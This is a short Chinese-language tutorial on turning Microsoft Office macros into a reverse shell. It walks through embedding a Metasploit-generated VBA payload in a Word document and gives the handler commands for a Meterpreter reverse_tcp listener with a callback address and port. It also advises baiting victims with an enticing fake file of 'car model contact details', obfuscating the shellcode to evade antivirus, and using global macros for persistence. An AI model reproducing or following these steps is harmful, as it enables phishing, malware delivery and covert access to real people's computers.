利用office宏反弹shell

一、普及一下office宏

office宏，译自英文单词Macro。宏是微软公司为其OFFICE软件包设计的一个特殊功能，软件设计者为了让人们在使用软件进行工作时，避免一再地重复相同的动作而设计出来的一种工具，它利用简单的语法，把常用的动作写成宏，当在工作时，就可以直接利用事先编好的宏自动运行，去完成某项特定的任务，而不必再重复相同的动作，目的是让用户文档中的一些任务自动化。

OFFICE中的WORD和EXCEL都有宏。Word便为大众事先定义一个共用的通用模板（Normal．dot），里面包含了基本的宏。只要一启动Word，就会自动运行Normal．dot文件。如果在Word中重复进行某项工作，可用宏使其自动执行。Word提供了两种创建宏的方法：宏录制器和Visual Basic编辑器。宏将一系列的Word命令和指令组合在一起，形成一个命令，以实现任务执行的自动化。在默认的情况下，Word将宏存贮在 Normal模板中，以便所有的Word文档均能使用，这一特点几乎为所有的宏病毒所利用。

宏实际上是一系列Word 命令的组合，用户可以在Visual Basic 编辑器中打开宏并进行编辑和调试，删除录制过程中录进来的一些不必要的步骤，或添加无法在Word 中录制的指令。

二、利用MSF生成宏的攻击payload

利用生成的jaky.vba文件弄进office文件里

这里要启用一下 宏 默认是关闭的

宏-查看宏

在文档里随便输入个文字什么的。最好是比较诱人的文字。

随便起个名字 然后 点击 创建

把kali生成的payload粘贴进来

保存

三、启用kali的监听模式

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.198.137

set LPORT 6666

四、伪装文件并攻击

完美的伪装自己的文件，才有诱惑力。比如：《全国车模的联系方式》

里面再放几个随机生成的手机号、名字。

有人点击 文件后。

快递正在路上 session正在路上

五、题外话

1、 当然这种简单的shellcode,有些会报毒。建议把shellcode部分做一下免杀处理。

2、如果创建的是全局宏，Office会在这个目录生成一个dotm文档：

C:\Users\（username）\AppData\Roaming\Microsoft\Templates

全局宏是对于当前计算机所有文档对象有效，即文档本身不包含宏代码，也可以运行全局宏。但是本身的全局宏名字是随机生成的，所以要先创建一个全局宏，定义一下名字。打开其他文档时才能调用并执行代码。

这个全局宏中的文件：vbaProject.bin是包含了特征的文件，但是反病毒软件不会扫描这个文件，除非主动查杀。

这个特性可能可以达到维持权限的作用。

全局宏一般能达到免杀的

这里鸣谢 倾旋 大佬的指点